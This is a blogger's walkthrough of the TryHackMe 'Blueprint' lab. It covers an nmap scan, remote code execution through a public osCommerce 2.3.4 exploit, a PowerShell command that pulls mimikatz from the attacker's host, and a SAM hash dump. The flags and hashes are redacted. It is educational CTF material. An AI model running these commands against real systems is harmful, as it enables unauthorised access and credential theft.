I decided to try a bit more Penetration Testing/Ethical Hacking. The following is a Write-Up regarding the TryHackMe room “Blueprint”.

Tasks

The only info that we have is:

Do you have what is takes to hack into this Windows Machine?

And the questions:

  • “Lab” user NTLM hash decrypted
  • root.txt

So we can assume it’s a Windows machine.

Discovery

I booted up my Kali linux machine and created a folder on my Desktop to use as a workspace.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
# create a workspace
mkdir Desktop/blueprint && cd Desktop/blueprint

# portscan with nmap
nmap -v -A -oN nmap-scan.txt 10.10.251.173

# nmap result
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 7.5
|_http-title: 404 - File or directory not found.
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2019-04-11 22:52  oscommerce-2.3.4/
| -     2019-04-11 22:52  oscommerce-2.3.4/catalog/
| -     2019-04-11 22:52  oscommerce-2.3.4/docs/
|_
| http-methods: 
|   Supported Methods: OPTIONS GET HEAD POST TRACE
|_  Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after:  2019-11-08T23:48:47
| MD5:   a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
|_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
|_http-title: Index of /
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| http-methods: 
|   Supported Methods: OPTIONS GET HEAD POST TRACE
|_  Potentially risky methods: TRACE
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2019-04-11 22:52  oscommerce-2.3.4/
| -     2019-04-11 22:52  oscommerce-2.3.4/catalog/
| -     2019-04-11 22:52  oscommerce-2.3.4/docs/
|_
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -20m03s, deviation: 34m37s, median: -4s
| smb-os-discovery: 
|   OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: BLUEPRINT
|   NetBIOS computer name: BLUEPRINT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-08-16T18:05:38+01:00
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-08-16T17:05:39
|_  start_date: 2024-08-16T17:02:15
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:a6:9b:93:fd:95 (unknown)
| Names:
|   BLUEPRINT<00>        Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   BLUEPRINT<20>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>

So we can observe:

  • Windows 7 Home SP1 / 7601 - wow that’s quite old
  • IIS on Port 80
  • Apache 2.4.23 on Port 443 and 8080
  • OSCommerce 2.3.4
  • PHP 5.6.28
  • OpenSSL 1.0.2h
  • MSRPC on Port 135
  • Netbios on Port 139
  • SMB on Port 445 (stated as microsoft-ds)
  • mySQL/MariaDB on Port 3306
  • a few high ports with msrpc
  • SMB scan could already retrieve some data as guest

All these outdated software’s probably have some vulnerabilities that I can use.

Initial Access: osCommerce 2.3.4 Exploit

Nmap already found a installation of osCommerce - an Online Shop application. The directory name already hints the version: 2.3.4. I quickly searched on Exploit-DB.com for osCommerce and found this exploit (EDB-ID 50128) by Bryan Leong <NobodyAtall>. The underlying issue is, if the /install directory wasn’t removed after installation, it’s possible to execute commands.

Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php

Since I have searchsploit installed on my Kali VM, I probably already have that exploit on disk:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
# find the path of the local exploit
searchsploit 50128 -p
  Exploit: osCommerce 2.3.4.1 - Remote Code Execution (2)
      URL: https://www.exploit-db.com/exploits/50128
     Path: /usr/share/exploitdb/exploits/php/webapps/50128.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable

# execute the exploit, using the URL of the osCommerce installation as a single parameter
python3 /usr/share/exploitdb/exploits/php/webapps/50128.py http://10.10.251.173:8080/oscommerce-2.3.4/catalog/
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: nt authority\system

RCE_SHELL$ whoami
nt authority\system

Okay, great. I got a shell, and I’m even running as NT Authority\SYSTEM. I think that’s a major misconfiguration to have the webserver run as SYSTEM, but well… It’s just an easy CTF game.

Retrieve root flag

In CTF’s a root flag is often located on the Administrator’s Desktop (if it’s a Windows machine). So I checked the directory, using the RCE_Shell I got from the Exploit.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
RCE_SHELL$ dir C:\users\administrator\desktop
 Volume in drive C has no label.
 Volume Serial Number is 14AF-C52C

 Directory of C:\users\administrator\desktop

11/27/2019  07:15 PM    <DIR>          .
11/27/2019  07:15 PM    <DIR>          ..
11/27/2019  07:15 PM                37 root.txt.txt
               1 File(s)             37 bytes
               2 Dir(s)  19,504,635,904 bytes free

RCE_SHELL$ more C:\users\administrator\desktop\root.txt.txt
THM{ **redacted to not ruin the fun** }

“Lab” user NTLM hash

I already have the necessary permissions (again: I’m running as NT Authority\SYSTEM). To retrieve the NTLM hash, I chose to spin up a simple local webserver on my Kali machine, to download mimikatz to the target system.

1
2
# in another terminal: spin up the webserver
python3 -m http.server 80

Then in the Exploit shell:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# download mimikatz using PowerShell
RCE_SHELL$ powershell (New-Object System.Net.WebClient).DownloadFile(\"http://10.14.85.51/mimikatz.exe\", \"mimikatz.exe\")

# dump the local SAM database using mimikatz
RCE_SHELL$ mimikatz "lsadump::sam" exit

  .#####.   mimikatz 2.2.0 (x86) #19041 Sep 19 2022 17:43:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::sam
Domain : BLUEPRINT
SysKey : 147a48de4a9815d2aa479598592b086f
Local SID : S-1-5-21-3130159037-241736515-3168549210

SAMKey : 3700ddba8f7165462130a4441ef47500

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: **redacted - to not spoil the fun**

RID  : 000001f5 (501)
User : Guest

RID  : 000003e8 (1000)
User : Lab
  Hash NTLM: **redacted - to not spoil the fun**

mimikatz(commandline) # exit
Bye!

Neat! So I took the NTLM hash for the Lab user and checked it using NTLM.pw. Since the password was pretty simple, it was listed there.